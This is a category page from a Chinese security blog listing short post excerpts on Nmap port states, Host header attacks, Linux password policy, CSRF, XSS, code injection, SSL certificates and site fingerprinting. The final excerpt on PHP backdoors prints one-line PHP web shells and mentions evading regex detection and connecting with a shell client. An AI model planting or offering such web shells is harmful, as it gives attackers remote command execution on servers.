分类:安全

安全是个很广的话题;包括网络部署安全、系统配置安全、服务部署安全以及代码安全等。

2018-10-09 0 By admin

NMAP 端口状态

虽然Nmap这些年来功能越来越多, 它也是从一个高效的端口扫描器开始的,并且那仍然是它的核心功能。 nmap 这个简单的命令扫描主机上的超过 1660个TCP端口。 。许多传统的端口扫描器只列出所有端口是开放还是关闭的, Nmap的信息粒度比它们要细得多。 它把端口分成六个状态: open(开放的)…

2018-05-02 0 By admin

Http Host 主机头攻击

在web访问过程中,客户端可以任意修改request header fields。这样我们就要明确一点,所有来自客户端的数据信息都不可信。 当客户端在请求头中人为添加了host头字段信息。这种就是利用http协议修改Host请求头攻击行为。 生效过程 客户端访问http://example.com/…

2018-03-22 0 By admin

Linux 系统密码策略

当前的网络环境,黑客行为猖獗地超出一个善良人的想象。 一台在线服务器如果没有限制sshd服务的端口,每天不会少于几百次的暴力破解密码操作。 为了服务器的安全着想,最好要限制可登录IP地址;不然可以限制使用证书登录;再不然就是设置密码机制了。 密码机制 包括几个方面,根据个人情况选择使用。 1、密码质…

2017-12-08 0 By admin

CSRF 跨站请求伪造

CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而C…

2017-12-08 0 By admin

跨站脚本Cross-site scripting

为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 XSS是一种在web应用中的计算机安全漏洞,它是恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS攻击分成两类 1、来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站…

2017-12-08 0 By admin

代码注入

代码注入(Code injection)可被攻击者用来导入代码到某特定的计算机程序,以改变程序的运行进程或目的。代码注入攻击的结果可以是灾难性的。 例如说:代码注入可作为许多电脑蠕虫繁殖的温床。 案例 冲浪者在web站点的输入接口,提交js\sql\php\html等代码;如果网站开发者没有考虑到对…

2017-09-22 0 By admin

ssl证书

SSL数字证书通过第三方SSL证书机构颁发 主要用于:身份证明、分发公钥、验证证书的合法性 SSL数字证书有以下几种: 企业级别:EV(Extended Validation)、OV(Organization Validation) 个人级别:IV(Identity Validation)、DV(D…

2016-10-21 0 By admin

判断网站开发语言

1、根据 meta 信息判断 不少的网站会在 meta 添加框架的信息,比如 Joomla、XOOPS、MediaWiki 会添加 generator;phpBB 会添加 copyright;Avactis 会添加 author。通过这些可以探测网站使用的建站系统,从而知道使用的语言。 2、根据 s…

2016-06-17 0 By admin

php 后门

可以通过以上方法修改assert后门,达到绕过正则: <?phpassert($_POST[password]);?> 三.变形一句话: <?php$_GET[‘xxoo’]($_POST[‘cmd’]);?> 客户端用菜刀,密…